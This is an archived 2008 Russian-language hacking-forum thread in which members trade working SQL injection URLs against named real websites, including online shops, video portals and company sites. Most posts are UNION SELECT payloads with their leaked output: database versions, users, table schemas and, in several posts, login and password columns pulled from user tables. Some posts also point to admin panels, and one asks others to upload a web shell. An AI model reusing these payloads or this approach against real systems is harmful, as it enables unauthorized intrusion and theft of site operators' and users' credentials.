HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.08.2008, 00:16
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

PR-6 от гарварда сайтек какой-то.
Цитата:
http://www.pluralism.org/news/article.php?id=10536
42
nameluralsm@www8.serve.com
Version:4.1.20-log
Dbname:news
 
Ответить с цитированием

  #2  
Старый 13.08.2008, 02:19
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию

Код:
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(version(),0x3a,user (),0x3a,database()),4,5/*
5.0.26
root@localhost
hqvideo

Код:
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_schema,0x3a,t able_name,0x3a,column_name),4,5+from+information_s chema.columns/*
http://www.hq-video.ru/details.php?id=-999999+union+select+1,2,concat(table_name,0x3a,col umn_name),4,5+from+information_schema.columns/*
кто шэл зальёт опешитесь
 
Ответить с цитированием

  #3  
Старый 13.08.2008, 04:36
PandoraBox
Постоянный
Регистрация: 06.05.2007
Сообщений: 393
Провел на форуме:
1510937

Репутация: 398
По умолчанию

Код:
http://www.profvideo.ru/index.php?ids=-501+union+select+1,2,version(),concat_ws(0x3a3a,user(),database()),5,6,7,8,9,10,11,12/*
4.1.22
profvideo@localhost
profvideo
 
Ответить с цитированием

  #4  
Старый 13.08.2008, 10:47
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

Интернет-магазин:
http://webkoleso.ru/index.php?pageId=-111111+union+select+1,2,3,concat_ws(0x3a,user(),ve rsion(),database()),5,6,7,8,9--
_________________________________________
edited:
http://magazine.ge/index.php?page=events&id=22+union+select+1,2,3,4,5 ,6,7,8,9--

http://svrwheels.ru/index.php?pageId=-111+union+select+1,2,3,4,5,6,7,8--

http://ihf-hr.org/documents/doc_summary.php?sec_id=1+union+select+1,concat_ws( 0x3a,version(),user(),database()),3-- <<<----с дальнейшим выводом проблемы :-/

Последний раз редактировалось Calcutta; 13.08.2008 в 12:58..
 
Ответить с цитированием

  #5  
Старый 13.08.2008, 16:31
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
По умолчанию

Код:
http://vesnasouvenir.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://trol.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://expoland.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vesnaboard.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.eva.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.cifrotech.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://ops-print.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vesnanaruzhka.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://vp.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://www.kominmet.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
http://piton.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
Все сайты управляются отсюда
http://www.as-admin.com/index.php
Жаль такого на юкоз нету

Последний раз редактировалось S0ulVortex; 16.08.2008 в 13:50..
 
Ответить с цитированием

  #6  
Старый 13.08.2008, 17:41
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
По умолчанию

Воть
Цитата:
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.columns/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.SCHEMATA/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+INFORMATION_SCHEMA.tables/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+users/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+dual/*
[OK] http://www.neopoliscasa.ru/news.phtml?item_id=-7596+UNION+SELECT+1,2,3,4+FR
OM+phpbb_users/*
 
Ответить с цитированием

  #7  
Старый 13.08.2008, 17:50
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

Цитата:
http://www.amplemama.ca/product-details.php?prid=20%&prname=Maternity%20Office%20W ear&sprid=&sprname=&product=64+union+select+1,user name,3,password,5,6,7,8,9,10,11,12+from+login/*
amplemama@82.165.233.47
4.1.7-nt
connetik_ample


админк:
http://www.amplemama.ca/bizcura/
аплоад картинок, но..ничего больше(
 
Ответить с цитированием

  #8  
Старый 13.08.2008, 18:04
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_ schema.columns+where+table_name=0x7573657273+limit +0,1--
users:
-id
-username
-password
-fname
-email

http://solf.ru/main.php?p=-111+union+select+1,column_name,3+from+information_ schema.columns+where+table_name=0x7961626c6f6b6f6d 61696c+limit+1,1--
mail:
-id
-email
-name
-code

дальше кому интересно - уже сами -)
 
Ответить с цитированием

  #9  
Старый 13.08.2008, 18:51
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
По умолчанию

http://www.fivedollarscripts.com/drinks/index.php?cmd=6&recid=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,1,2,3+from+drinksadmin/*

админка
http://www.fivedollarscripts.com/drinks/admin2

Ну тут тупо инекция пашет а в админку непопасть.
 
Ответить с цитированием

  #10  
Старый 13.08.2008, 20:39
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
По умолчанию

http://all4sims.de/board/filebase.php?userid=1'
lol истина гдето рядом -) мож даже скуль есть..
Код:
SQL-DATABASE ERROR

Database error in WoltLab Burning Board (2.3.6 pl2): Invalid SQL: SELECT username FROM bb1_users WHERE userid='1'' 
mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 
mysql error number: 1064 
mysql version: 5.0.45-community 
php version: 4.4.9 
Date: 13.08.2008 @ 18:37 
Script: /board/filebase.php?userid=1' 
Referer:
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.